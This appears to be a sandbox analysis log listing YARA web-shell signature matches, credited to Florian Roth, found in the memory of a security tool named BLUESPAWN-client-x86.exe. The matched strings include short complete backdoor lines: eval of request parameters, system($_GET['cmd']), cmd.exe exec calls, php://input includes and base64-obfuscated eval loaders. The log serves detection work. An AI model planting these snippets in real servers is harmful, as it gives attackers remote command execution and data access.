- 0x318ff0:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x33e625:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x36a87d:$s0: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Reques
- 0x2dac97:$s1: Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
- 0x33e673:$s1: Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_list1 | Web Shell - file list1.jsp | Florian Roth | - 0x2dae24:$s1: case 's':ConnectionDBM(out,encodeChange(request.getParameter("drive
- 0x33e77c:$s1: case 's':ConnectionDBM(out,encodeChange(request.getParameter("drive
- 0x2dae74:$s9: return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\"
- 0x33e7c2:$s9: return "<a href=\"javascript:delFile('"+folderReplace(file)+"')\"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpkit_1_0_odd | Web Shell - file odd.php | Florian Roth | - 0x2daff5:$s0: include('php://input');
- 0x2dc63e:$s0: include('php://input');
- 0x2db019:$s1: // No eval() calls, no system() calls, nothing normally seen as malicious.
- 0x2db070:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x2dc662:$s2: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_123 | Web Shell - file 123.jsp | Florian Roth | - 0x2db1ef:$s0: <font color="blue">??????????????????:</font><input type="text" size="7
- 0x33ea21:$s0: <font color="blue">??????????????????:</font><input type="text" size="7
- 0x2d5d3b:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db243:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfe50:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33b0f8:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33ea6b:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x341df0:$s3: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db299:$s9: <input type="submit" name="btnSubmit" value="Upload">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_1 | Web Shell - file 1.asp | Florian Roth | - 0x2db407:$s4: !22222222222222222222222222222222222222222222222222
- 0x2d8c67:$s8: <%eval request("pass")%>
- 0x2db447:$s8: <%eval request("pass")%>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_tool | Web Shell - file tool.asp | Florian Roth | - 0x2db59a:$s0: Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """
- 0x33eca6:$s0: Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """
- 0x2db5ee:$s3: Response.Write "<tr><td><font face='arial' size='2'><b><DIR> <a href='"
- 0x33ecf0:$s3: Response.Write "<tr><td><font face='arial' size='2'><b><DIR> <a href='"
- 0x2db649:$s9: Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javas
- 0x33ed41:$s9: Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javas
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cmd_win32 | Web Shell - file cmd_win32.jsp | Florian Roth | - 0x2db7d3:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParam
- 0x33ee47:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParam
- 0x2db826:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x2df6e0:$s1: <FORM METHOD="POST" NAME="myform" ACTION="">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_jshell | Web Shell - file jshell.jsp | Florian Roth | - 0x2db991:$s0: kXpeW["
- 0x2db9a5:$s4: [7b:g0W@W<
- 0x2db9bc:$s5: b:gHr,g<
- 0x2db9d1:$s8: RhV0W@W<
- 0x2db9e6:$s9: S_MR(u7b
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_zehir4 | Web Shell - file zehir4.asp | Florian Roth | - 0x2dbb2d:$s9: Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/
- 0x33f067:$s9: Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_wsb_idc | Web Shell - file idc.php | Florian Roth | - 0x2dbca4:$s1: if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
- 0x2dbceb:$s3: {eval($_GET['idc']);}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cpg_143_incl_xpl | Web Shell - file cpg_143_incl_xpl.php | Florian Roth | - 0x2dbe4f:$s3: $data="username=".urlencode($USER)."&password=".urlencode($PA
- 0x33f277:$s3: $data="username=".urlencode($USER)."&password=".urlencode($PA
- 0x2dbe99:$s5: fputs($sun_tzu,"<?php echo \"Hi Master!\";ini_set(\"max_execution_time
- 0x33f2b7:$s5: fputs($sun_tzu,"<?php echo \"Hi Master!\";ini_set(\"max_execution_time
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_mumaasp_com | Web Shell - file mumaasp.com.asp | Florian Roth | - 0x2dc024:$s0: &9K_)P82ai,A}I92]R"q!C:RZ}S6]=PaTTR
- 0x33f3be:$s0: &9K_)P82ai,A}I92]R"q!C:RZ}S6]=PaTTR
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_404 | Web Shell - file 404.php | Florian Roth | - 0x2dc180:$s0: $pass = md5(md5(md5($pass)));
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshell_cnseay_x | Web Shell - file webshell-cnseay-x.php | Florian Roth | - 0x2dc2ee:$s9: $_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_
- 0x33f580:$s9: $_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_up | Web Shell - file up.asp | Florian Roth | - 0x2dc46d:$s0: Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Dispositio
- 0x33f67b:$s0: Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Dispositio
- 0x2dc4bf:$s1: ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpkit_0_1a_odd | Web Shell - file odd.php | Florian Roth | - 0x2daff5:$s1: include('php://input');
- 0x2dc63e:$s1: include('php://input');
- 0x2db070:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x2dc662:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x2dc6b5:$s4: // uses include('php://input') to execute arbritary code
- 0x2dc6fa:$s5: // php://input based backdoor
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_Shell_x3 | Web Shell - file PHP Shell.php | Florian Roth | - 0x2dc9d5:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2defc2:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x33fa2f:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x3413c8:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2dca19:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2fa7b3:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x33fa69:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x35456b:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x2dca6d:$s9: if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(
- 0x33fab3:$s9: if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_g00nv13 | Web Shell - file g00nv13.php | Florian Roth | - 0x2dcbfa:$s1: case "zip": case "tar": case "rar": case "gz": case "cab": cas
- 0x33fbbc:$s1: case "zip": case "tar": case "rar": case "gz": case "cab": cas
- 0x2dcc45:$s4: if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p
- 0x33fbfd:$s4: if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x2dcdcc:$s0: <?php eval(gzuncompress(base64_decode("
- 0x33fd00:$s0: <?php eval(gzuncompress(base64_decode("
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_zx | Web Shell - file zx.jsp | Florian Roth | - 0x2dcf2a:$s0: if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.g
- 0x33fdda:$s0: if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.g
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Ani_Shell | Web Shell - file Ani-Shell.php | Florian Roth | - 0x2dd0b9:$s0: $Python_CODE = "I
- 0x33fee5:$s0: $Python_CODE = "I
- 0x2dd0d7:$s6: $passwordPrompt = "\n=================================================
- 0x33fef9:$s6: $passwordPrompt = "\n=================================================
- 0x2dd12a:$s7: fputs ($sockfd ,"\n===============================================
- 0x33ff42:$s7: fputs ($sockfd ,"\n===============================================
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_k8cmd | Web Shell - file k8cmd.jsp | Florian Roth | - 0x2dd2a9:$s2: if(request.getSession().getAttribute("hehe").toString().equals("hehe"))
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_cmd | Web Shell - file cmd.jsp | Florian Roth | - 0x2dd429:$s6: out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_k81 | Web Shell - file k81.jsp | Florian Roth | - 0x2dd5a2:$s1: byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);
- 0x2dd5f3:$s9: if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_ASP_zehir | Web Shell - file zehir.asp | Florian Roth | - 0x2dd767:$s9: Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&
- 0x340365:$s9: Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Worse_Linux_Shell | Web Shell - file Worse Linux Shell.php | Florian Roth | - 0x2dd905:$s0: system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD
- 0x34047f:$s0: system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_zacosmall | Web Shell - file zacosmall.php | Florian Roth | - 0x2dda7d:$s0: if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>
- 0x340573:$s0: if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x2ddc66:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x306b3e:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_redirect | Web Shell - file redirect.asp | Florian Roth | - 0x2dddd9:$s7: var flag = "?txt=" + (document.getElementById("dl").checked ? "2":"1"
- 0x3407c7:$s7: var flag = "?txt=" + (document.getElementById("dl").checked ? "2":"1"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x2ddf5e:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2e13c2:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Java_Shell | Web Shell - file Java Shell.jsp | Florian Roth | - 0x2de0c6:$s4: public JythonShell(int columns, int rows, int scrollback) {
- 0x2de10e:$s9: this(null, Py.getSystemState(), columns, rows, scrollback);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_1d | Web Shell - file 1d.asp | Florian Roth | - 0x2de280:$s0: +9JkskOfKhUxZJPL~\(mD^W~[,{@#@&EO
- 0x340ad8:$s0: +9JkskOfKhUxZJPL~\(mD^W~[,{@#@&EO
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_IXRbE | Web Shell - file IXRbE.jsp | Florian Roth | - 0x2de3de:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x2e33e7:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x340bb2:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x34424c:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_G5 | Web Shell - file G5.php | Florian Roth | - 0x2de563:$s3: echo "Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op
- 0x340cb3:$s3: echo "Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_r57142 | Web Shell - file r57142.php | Florian Roth | - 0x2de6f1:$s0: $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_tree | Web Shell - file tree.jsp | Florian Roth | - 0x2de87a:$s5: $('#tt2').tree('options').url = "selectChild.action?checki
- 0x340ec2:$s5: $('#tt2').tree('options').url = "selectChild.action?checki
- 0x2de8c1:$s6: String basePath = request.getScheme()+"://"+request.getServerName()+":"+requ
- 0x340eff:$s6: String basePath = request.getScheme()+"://"+request.getServerName()+":"+requ
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_C99madShell_v_3_0_smowu | Web Shell - file smowu.php | Florian Roth | - 0x2dea58:$s2: <tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><for
- 0x341012:$s2: <tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><for
- 0x2deaaf:$s8: <p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input ty
- 0x34105f:$s8: <p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input ty
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_simple_backdoor | Web Shell - file simple-backdoor.php | Florian Roth | - 0x2dec4a:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2f7327:$s0: $cmd = ($_REQUEST['cmd']);
- 0x308f7b:$s0: $cmd = ($_REQUEST['cmd']);
- 0x35eff2:$s0: $cmd = ($_REQUEST['cmd']);
- 0x2dec71:$s1: if(isset($_REQUEST['cmd'])){
- 0x308fc4:$s1: if(isset($_REQUEST['cmd'])){
- 0x309895:$s1: if(isset($_REQUEST['cmd'])){
- 0x2dec9a:$s4: system($cmd);
- 0x30900e:$s4: system($cmd);
- 0x3098be:$s4: system($cmd);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_404 | Web Shell - file 404.php | Florian Roth | - 0x2dede0:$s4: <span>Posix_getpwuid ("Read" /etc/passwd)
- 0x341274:$s4: <span>Posix_getpwuid ("Read" /etc/passwd)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Macker_s_Private_PHPShell | Web Shell - file Macker\'s Private PHPShell.php | Florian Roth | - 0x2def6a:$s3: echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:&n
- 0x34137a:$s3: echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:&n
- 0x2dc9d5:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2defc2:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x33fa2f:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x3413c8:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2df006:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x2fa807:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x341402:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x3545b5:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Antichat_Shell_v1_3_2 | Web Shell - file Antichat Shell v1.3.php | Florian Roth | - 0x2df1a3:$s3: $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><m
- 0x34151b:$s3: $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><m
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Safe_mode_breaker | Web Shell - file Safe mode breaker.php | Florian Roth | - 0x2df342:$s5: preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(
- 0x341636:$s5: preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(
- 0x2df392:$s6: $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL).
- 0x34167c:$s6: $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL).
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Sst_Sheller | Web Shell - file Sst-Sheller.php | Florian Roth | - 0x2df50f:$s2: echo "<a href='?page=filemanager&id=fm&fchmod=$dir$file'>
- 0x341775:$s2: echo "<a href='?page=filemanager&id=fm&fchmod=$dir$file'>
- 0x2df555:$s3: <? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)
- 0x3417b1:$s3: <? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_list | Web Shell - file list.jsp | Florian Roth | - 0x2db826:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x2df6e0:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x2df719:$s2: out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn
- 0x3418e7:$s2: out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn
- 0x2df772:$s7: if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHPJackal_v1_5 | Web Shell - file PHPJackal v1.5.php | Florian Roth | - 0x2df901:$s7: echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form
- 0x341a41:$s7: echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form
- 0x2df959:$s8: echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr
- 0x341a8f:$s8: echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_customize | Web Shell - file customize.jsp | Florian Roth | - 0x2d8ae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2dfae5:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2e29fa:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x33cf92:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x341b97:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x343b95:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_s72_Shell_v1_1_Coding | Web Shell - file s72 Shell v1.1 Coding.php | Florian Roth | - 0x2dfc89:$s5: <font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya
- 0x341cb7:$s5: <font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_sys3 | Web Shell - file sys3.jsp | Florian Roth | - 0x2db299:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x2dfe0e:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x2e2b86:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x2d5d3b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db243:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfe50:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33b0f8:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33ea6b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x341df0:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfea6:$s9: <%@page contentType="text/html;charset=gb2312"%>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_guige02 | Web Shell - file guige02.jsp | Florian Roth | - 0x2e0017:$s0: ????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#fff
- 0x341f29:$s0: ????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#fff
- 0x2e0073:$s1: <%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private
- 0x341f7b:$s1: <%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_ghost | Web Shell - file ghost.php | Florian Roth | - 0x2e01fc:$s1: <?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'
- 0x342080:$s1: <?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'
- 0x2e0259:$s6: //<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***
- 0x3420d3:$s6: //<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***
- 0x2e02b5:$s7: preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(KmU("
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_WinX_Shell | Web Shell - file WinX Shell.php | Florian Roth | - 0x2e0427:$s5: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam
- 0x342213:$s5: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam
- 0x2e0476:$s8: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </
- 0x342258:$s8: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Crystal_Crystal | Web Shell - file Crystal.php | Florian Roth | - 0x2e05fe:$s1: show opened ports</option></select><input type="hidden" name="cmd_txt" value
- 0x34235c:$s1: show opened ports</option></select><input type="hidden" name="cmd_txt" value
- 0x2e0657:$s6: " href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></f
- 0x3423ab:$s6: " href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></f
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57_1_4_0 | Web Shell - file r57.1.4.0.php | Florian Roth | - 0x2e07e3:$s4: @ini_set('error_log',NULL);
- 0x2f3bd8:$s4: @ini_set('error_log',NULL);
- 0x2e080b:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x2f3b45:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x2e0841:$s7: @ini_restore("disable_functions");
- 0x2e0870:$s9: @ini_restore("safe_mode_exec_dir");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_hsxa1 | Web Shell - file hsxa1.jsp | Florian Roth | - 0x2d8914:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x2e09d0:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x33ce4f:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x3425fe:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_ajn | Web Shell - file ajn.asp | Florian Roth | - 0x2e0b54:$s1: seal.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
- 0x2e0ba5:$s6: seal.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOve
- 0x342745:$s6: seal.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOve
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_cmd | Web Shell - file cmd.php | Florian Roth | - 0x2e0d28:$s0: if($_GET['cmd']) {
- 0x2e0d47:$s1: // cmd.php = Command Execution
- 0x2e0d72:$s7: system($_GET['cmd']);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_list | Web Shell - file list.asp | Florian Roth | - 0x2e0ec4:$s0: <INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
- 0x2e0f04:$s4: Response.Write("<h3>FILE: " & file & "</h3>")
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_co | Web Shell - file co.php | Florian Roth | - 0x2e1068:$s0: cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV
- 0x2e109d:$s11: 6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_150 | Web Shell - file 150.php | Florian Roth | - 0x2e11fe:$s0: HJ3HjqxclkZfp
- 0x342b67:$s0: HJ3HjqxclkZfp
- 0x2e1218:$s1: <? eval(gzinflate(base64_decode('
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_cmdjsp_2 | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x2e137a:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2fd335:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2ddf5e:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2e13c2:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_c37 | Web Shell - file c37.php | Florian Roth | - 0x2e1520:$s3: array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),
- 0x342d6d:$s3: array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),
- 0x2e1566:$s9: ++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],
- 0x342da9:$s9: ++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x2e16ef:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
- 0x342eae:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_backdoor | Web Shell - file php-backdoor.php | Florian Roth | - 0x2e1866:$s1: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
- 0x2e18c2:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x306de2:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x342ff3:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x35d67e:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
